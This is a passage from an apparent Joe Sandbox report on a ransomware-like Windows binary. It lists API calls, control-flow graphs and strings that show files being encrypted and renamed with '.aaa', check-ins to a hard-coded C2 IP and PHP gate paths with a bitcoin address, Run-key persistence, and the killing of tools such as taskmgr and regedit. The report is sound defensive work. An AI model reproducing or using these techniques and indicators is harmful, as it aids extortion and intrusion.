                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandle$Open$FileRead_memset_strcpy_s
                                                                                                                            • String ID: 8.46.123.189$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE$http://ipinfo.io/ip
                                                                                                                            • API String ID: 3451672010-2122521707
                                                                                                                            • Opcode ID: e612f7f2b18badeb7e585ccf4dc9dfb37dad1401e8aef3cf68842487d3f7b7a2
                                                                                                                            • Instruction ID: 15cbbe58e9625973908351285b623f5b827d69d73ed0f1a4b7c35f1f0d30dc65
                                                                                                                            • Opcode Fuzzy Hash: e612f7f2b18badeb7e585ccf4dc9dfb37dad1401e8aef3cf68842487d3f7b7a2
                                                                                                                            • Instruction Fuzzy Hash: B121D8B1A402187BD7219B54AD46FEE7B78DB85710F1000EAFB04B71D1DB742E058BAD
                                                                                                                            Function 0041AE10 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 310COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ....................$P6C$P6C$gfff
                                                                                                                            • API String ID: 0-2552349421
                                                                                                                            • Opcode ID: 0eb62f8cffe97e059bdac99334968231d5c34eba919a1b1e0f4c90ae134b41d0
                                                                                                                            • Instruction ID: 1a57dfd0861042f04d653370a4c601d03e899c9ff72e49831f653edbe7fd71a6
                                                                                                                            • Opcode Fuzzy Hash: 0eb62f8cffe97e059bdac99334968231d5c34eba919a1b1e0f4c90ae134b41d0
                                                                                                                            • Instruction Fuzzy Hash: 9BC1C1756083419BC314DF25D8C1AABBBE5FFC9344F008A2EF89987241D775E889CB96
                                                                                                                            Function 0041E810 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041D8AF), ref: 0041E829
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041D8AF), ref: 0041E830
                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 0041E871
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041E87B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3874597930-0
                                                                                                                            • Opcode ID: f688baa8280873468b5661b1a4942b4155e0f9579dac2713f4a1671ad52b9afb
                                                                                                                            • Instruction ID: 269530095bf515f302acf201c8fd37964e73f2dce42f1b02fb8cc585cf08c6bc
                                                                                                                            • Opcode Fuzzy Hash: f688baa8280873468b5661b1a4942b4155e0f9579dac2713f4a1671ad52b9afb
                                                                                                                            • Instruction Fuzzy Hash: DA01B530A002089BDB14DFE4DD46BAEB7B8FF48700F50406DE606A7380DB746944CB99
                                                                                                                            Function 00231AF5 Relevance: 3.3, APIs: 2, Instructions: 283memorythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNEL32(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction ID: 32211ed43804c9c2024fb423d83f40c87190245b08f71caeb1ba956bcd53cb85
                                                                                                                            • Opcode Fuzzy Hash: 1d338c59a85754a57e57f96408806357cb45cbd025ef408088fc94aa2307c2d1
                                                                                                                            • Instruction Fuzzy Hash: E0916CF2E34729CFEB19CA64CC917BDB272FBC1300F19966AC107AB145DAF459658E40
                                                                                                                            Function 00231B34 Relevance: 1.7, APIs: 1, Instructions: 192memorythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,26417AC6), ref: 00231B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                              • Part of subcall function 00231DD0: VirtualAlloc.KERNEL32(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction ID: d34ac70a124d5ab01515cd46ee62588fb34addd97495f0f1b6d5c9fc03f0b873
                                                                                                                            • Opcode Fuzzy Hash: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction Fuzzy Hash: 8661E9B2E34728CFDB19CE64CC817ADF772BF85304F1586AAC006AB254DBB059659F81
                                                                                                                            Function 00413D10 Relevance: 73.8, APIs: 41, Strings: 1, Instructions: 321memoryfilesleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 237 413d10-413dbe call 42c690 call 42b910 call 42441c call 42474a GetFileAttributesW 246 413ee1-413ef4 call 423ebb 237->246 247 413dc4-413dc6 237->247 249 413dd3-413dee CreateFileW 247->249 250 413dc8-413dcd SetFileAttributesW 247->250 249->246 252 413df4-413e07 GetFileSize 249->252 250->249 253 413eda-413edb CloseHandle 252->253 254 413e0d-413e0f 252->254 253->246 254->253 255 413e15-413e1b 254->255 255->253 256 413e21-413e71 call 41b290 GetProcessHeap RtlAllocateHeap 255->256 256->253 259 413e73-413e97 ReadFile 256->259 260 413ec0-413ecc 259->260 261 413e99-413ebf CloseHandle GetProcessHeap HeapFree call 423ebb 259->261 262 413ef5-413f22 call 42b910 GetProcessHeap RtlAllocateHeap 260->262 263 413ece-413ed4 GetProcessHeap HeapFree 260->263 262->263 268 413f24-413f59 call 422720 call 41a670 262->268 263->253 273 413f92-413fe5 SetFilePointer WriteFile * 2 268->273 274 413f5b-413f6f GetProcessHeap HeapFree 268->274 275 414001-414026 WriteFile 273->275 276 413fe7-413ffc GetProcessHeap HeapFree 273->276 277 413f70-413f91 GetProcessHeap HeapFree CloseHandle call 423ebb 274->277 275->276 278 414028-414052 WriteFile 275->278 276->277 281 414054-414068 GetProcessHeap HeapFree 278->281 282 41406d-41407d FlushFileBuffers CloseHandle 278->282 281->277 283 414080-414098 MoveFileExW 282->283 284 4140c5-414101 GetProcessHeap HeapFree GetProcessHeap HeapFree call 423ebb 283->284 285 41409a-4140a5 GetLastError 283->285 289 414106-414109 284->289 286 4140b4-4140c3 Sleep 285->286 287 4140a7-4140ae DeleteFileW 285->287 286->283 286->284 287->286
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00413D7D
                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,00413CC5), ref: 00413DB5
                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,?,00413CC5), ref: 00413DCD
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413DE3
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413DF6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413E64
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413E67
                                                                                                                            • ReadFile.KERNEL32 ref: 00413E8F
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413E9A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413EA3
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413EA6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000001,?,00413CC5), ref: 00413ED1
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413ED4
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413EDB
                                                                                                                            • _memset.LIBCMT ref: 00413F00
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000080,00000000,?,?,?,?,?,?,?,?,?,00000001,?,00413CC5), ref: 00413F11
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,00000001,?,00413CC5), ref: 00413F14
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413F5E
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413F67
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00413F72
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413F75
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413F78
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00413F99
                                                                                                                            • WriteFile.KERNEL32 ref: 00413FBD
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 00413FDD
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413FEA
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413FF3
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 0041401E
                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0041404A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00414056
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041405F
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041406E
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00414075
                                                                                                                            • MoveFileExW.KERNEL32(?,?,00000008), ref: 00414090
                                                                                                                            • GetLastError.KERNEL32 ref: 0041409A
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 004140AE
                                                                                                                            • Sleep.KERNEL32(00000190), ref: 004140B9
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004140DB
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004140E4
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004140EF
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004140F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$File$Process$Free$CloseHandleWrite$AllocateAttributes_memset$BuffersCreateDeleteErrorFlushLastMovePointerReadSizeSleep
                                                                                                                            • String ID: .aaa
                                                                                                                            • API String ID: 1162163845-1861201198
                                                                                                                            • Opcode ID: c7964b7a0b8285ae2cbd51e6d8023304e21054539a1ac845c39b0415e82cf461
                                                                                                                            • Instruction ID: 9007e59ba22c1aaf5beb208bc48bb55982d0225d1ffcd51d997189a139798c44
                                                                                                                            • Opcode Fuzzy Hash: c7964b7a0b8285ae2cbd51e6d8023304e21054539a1ac845c39b0415e82cf461
                                                                                                                            • Instruction Fuzzy Hash: 8DB19871A00218ABEB15DBA4DC89FEE777CEF5C315F00419AF609E2290DB745E848B69
                                                                                                                            Function 0041A030 Relevance: 66.9, APIs: 23, Strings: 15, Instructions: 363networkfilestringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 290 41a030-41a058 call 42c690 293 41a05a-41a06a 290->293 294 41a06c-41a082 call 412640 290->294 295 41a086-41a08e 293->295 294->295 298 41a090-41a095 295->298 298->298 299 41a097-41a099 298->299 300 41a0a0-41a0dc call 42b910 InternetOpenA 299->300 301 41a09b call 41a560 299->301 305 41a0e0-41a205 call 42b910 _alldiv * 2 call 41a650 call 42b910 300->305 301->300 312 41a208-41a20d 305->312 312->312 313 41a20f-41a2df call 42b910 call 41f0c0 call 41f1b0 call 422720 312->313 322 41a2e0-41a2e5 313->322 322->322 323 41a2e7-41a359 call 42b910 call 41a670 call 40e750 call 40ea80 call 412640 322->323 334 41a35b-41a368 323->334 335 41a36a-41a376 323->335 336 41a377-41a3aa call 41a650 call 40e6c0 call 424005 334->336 335->336 343 41a3c0-41a3e4 InternetConnectA InternetSetCookieA 336->343 344 41a3ac-41a3be InternetConnectA 336->344 345 41a3e9-41a436 HttpOpenRequestA call 42b910 HttpSendRequestA GetLastError 343->345 344->345 348 41a438-41a469 InternetReadFile strstr 345->348 349 41a46b-41a48b InternetCloseHandle * 2 345->349 348->349 350 41a491-41a4a2 InternetCloseHandle 348->350 349->305 349->350 351 41a549-41a54b ExitThread 350->351 352 41a4a8-41a4c6 call 424005 350->352 355 41a4c8-41a4ca 352->355 356 41a4cc-41a4e0 call 40e7d0 352->356 357 41a52a-41a52c 355->357 363 41a4e2-41a4e6 356->363 364 41a53d 356->364 359 41a542-41a544 call 40e6c0 357->359 360 41a52e-41a53b 357->360 359->351 360->359 365 41a513-41a528 363->365 366 41a4e8-41a4ef 363->366 364->359 365->357 367 41a4f1-41a4f5 366->367 368 41a4f8-41a509 366->368 367->368 368->365 371 41a50b-41a510 368->371 371->365
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041A0B5
                                                                                                                            • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0,00000000,00000000,00000000,00000000), ref: 0041A0C6
                                                                                                                            • _memset.LIBCMT ref: 0041A0EE
                                                                                                                            • _alldiv.NTDLL(0384BF10,00000000,00000400,00000000), ref: 0041A16D
                                                                                                                            • _alldiv.NTDLL(00000000,?,00000400,00000000), ref: 0041A17A
                                                                                                                            • _memset.LIBCMT ref: 0041A1BC
                                                                                                                            • _memset.LIBCMT ref: 0041A21B
                                                                                                                            • _memset.LIBCMT ref: 0041A304
                                                                                                                            • _free.LIBCMT ref: 0041A38A
                                                                                                                            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0041A3B0
                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00C03380,00000000), ref: 0041A3FA
                                                                                                                            • _memset.LIBCMT ref: 0041A417
                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A428
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A42E
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000C16,?), ref: 0041A44B
                                                                                                                            • strstr.NTDLL ref: 0041A45E
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A472
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A475
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0041A496
                                                                                                                            • _free.LIBCMT ref: 0041A4AD
                                                                                                                            • ExitThread.KERNEL32 ref: 0041A54B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet_memset$CloseHandle$HttpOpenRequest_alldiv_free$ConnectErrorExitFileLastReadSendThreadstrstr
                                                                                                                            • String ID: $ KC$,JC$---!!!INSERTED!!!---$/inst.php?%s$/wp-content/themes/r.php?%s$1FQ2d43QjTT8zSrWe41EdxtvcVUMWyryJB$2.0.4e1$8.46.123.189$GET$Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0$Subject=%s&key=%s&addr=%s&size=%lld&version=%s&OS=%ld&ID=%d&gate=%s&ip=%s&inst_id=%X%X%X%X%X%X%X%X$eirutyerg23895385tiyiruytyieye$gj$IC
                                                                                                                            • API String ID: 1974382559-2346157570
                                                                                                                            • Opcode ID: 41994da5b1be1fb6a75406e9cb8cd053ad74d2b3d8e99e9ae054abe7998559ef
                                                                                                                            • Instruction ID: 54ce2dd3979e93718385dbc83f77f21fcc090a503bd1d9ebae0c96c4fc529177
                                                                                                                            • Opcode Fuzzy Hash: 41994da5b1be1fb6a75406e9cb8cd053ad74d2b3d8e99e9ae054abe7998559ef
                                                                                                                            • Instruction Fuzzy Hash: 47D116B1108344AFD310DF65DC84FEBB7E8EB89348F04492EF589A7251D778A944CB6A
                                                                                                                            Function 0041E5B0 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 131sleepthreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 373 41e5b0-41e5fb call 42c690 call 42b910 GetCurrentProcessId 378 41e791-41e793 ExitThread 373->378 379 41e601-41e607 373->379 380 41e610-41e62b K32EnumProcesses 379->380 381 41e631-41e644 380->381 382 41e784-41e78b 380->382 383 41e763-41e77e call 42b910 Sleep 381->383 384 41e64a 381->384 382->378 382->380 383->382 385 41e650-41e65d 384->385 387 41e663-41e665 385->387 388 41e75a-41e75d 385->388 387->388 390 41e66b-41e67d OpenProcess 387->390 388->383 388->385 391 41e683-41e6b2 call 42b910 K32GetProcessImageFileNameW 390->391 392 41e74d-41e74e CloseHandle 390->392 396 41e6b5-41e6be 391->396 393 41e754 392->393 393->388 396->396 397 41e6c0-41e6c4 396->397 397->393 398 41e6ca-41e6d6 call 424733 397->398 400 41e6db-41e6ee wcsstr 398->400 401 41e6f0-41e703 wcsstr 400->401 402 41e744-41e747 TerminateProcess 400->402 401->402 403 41e705-41e718 wcsstr 401->403 402->392 403->402 404 41e71a-41e72d wcsstr 403->404 404->402 405 41e72f-41e742 wcsstr 404->405 405->392 405->402
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: wcsstr$Process$_memset$CloseCurrentEnumExitFileHandleImageNameOpenProcessesSleepTerminateThread
                                                                                                                            • String ID: cmd.exe$msconfig$procexp$regedit$taskmgr
                                                                                                                            • API String ID: 2119192008-1900680373
                                                                                                                            • Opcode ID: 49b60125fb1ef31ec321f64275eaff664fabf809e26223123b7d1af1dba68724
                                                                                                                            • Instruction ID: b41a84964e6ed2460d4e8ad48bc2fa2dce5e79e8a0c792882b117dd623cb1915
                                                                                                                            • Opcode Fuzzy Hash: 49b60125fb1ef31ec321f64275eaff664fabf809e26223123b7d1af1dba68724
                                                                                                                            • Instruction Fuzzy Hash: 5841E978600315AAFB24DB61DD85FEB33B8EF44705F4404A9EA04A6291EB749A84CF6D
                                                                                                                            Function 0041E609 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 108sleepthreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 406 41e609 407 41e610-41e62b K32EnumProcesses 406->407 408 41e631-41e644 407->408 409 41e784-41e78b 407->409 410 41e763-41e77e call 42b910 Sleep 408->410 411 41e64a 408->411 409->407 412 41e791-41e793 ExitThread 409->412 410->409 413 41e650-41e65d 411->413 415 41e663-41e665 413->415 416 41e75a-41e75d 413->416 415->416 418 41e66b-41e67d OpenProcess 415->418 416->410 416->413 419 41e683-41e6b2 call 42b910 K32GetProcessImageFileNameW 418->419 420 41e74d-41e74e CloseHandle 418->420 424 41e6b5-41e6be 419->424 421 41e754 420->421 421->416 424->424 425 41e6c0-41e6c4 424->425 425->421 426 41e6ca-41e6ee call 424733 wcsstr 425->426 429 41e6f0-41e703 wcsstr 426->429 430 41e744-41e747 TerminateProcess 426->430 429->430 431 41e705-41e718 wcsstr 429->431 430->420 431->430 432 41e71a-41e72d wcsstr 431->432 432->430 433 41e72f-41e742 wcsstr 432->433 433->420 433->430
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: wcsstr$Process$_memset$CloseEnumExitFileHandleImageNameOpenProcessesSleepTerminateThread
                                                                                                                            • String ID: cmd.exe$msconfig$procexp$regedit$taskmgr
                                                                                                                            • API String ID: 1297472855-1900680373
                                                                                                                            • Opcode ID: 22f4bf45e7dd060e927349efac75083e86ce27df5250862ad24d1892c0f395a6
                                                                                                                            • Instruction ID: 0a4d8f05a93888b46b05cfc5cbb2e96727153d1d6f06e26b6d14b9e59b0751ca
                                                                                                                            • Opcode Fuzzy Hash: 22f4bf45e7dd060e927349efac75083e86ce27df5250862ad24d1892c0f395a6
                                                                                                                            • Instruction Fuzzy Hash: DB31C978600315AAFB24DB61DD85FEA3378DF44709F4404A5EB05B6181E7749684CF5D
                                                                                                                            Function 0041E150 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 112registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000000,00000000,00020006,00000000,0041D95E,00000000), ref: 0041E183
                                                                                                                            • RegSetValueExW.KERNEL32 ref: 0041E19E
                                                                                                                            • RegFlushKey.ADVAPI32(0041D95E), ref: 0041E1AA
                                                                                                                            • RegCloseKey.ADVAPI32(0041D95E), ref: 0041E1B0
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0041E1D3
                                                                                                                            • RegSetValueExW.KERNEL32 ref: 0041E206
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 0041E20C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041E212
                                                                                                                            • RegCreateKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 0041E235
                                                                                                                            • RegSetValueExW.KERNEL32 ref: 0041E266
                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 0041E26C
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041E272
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
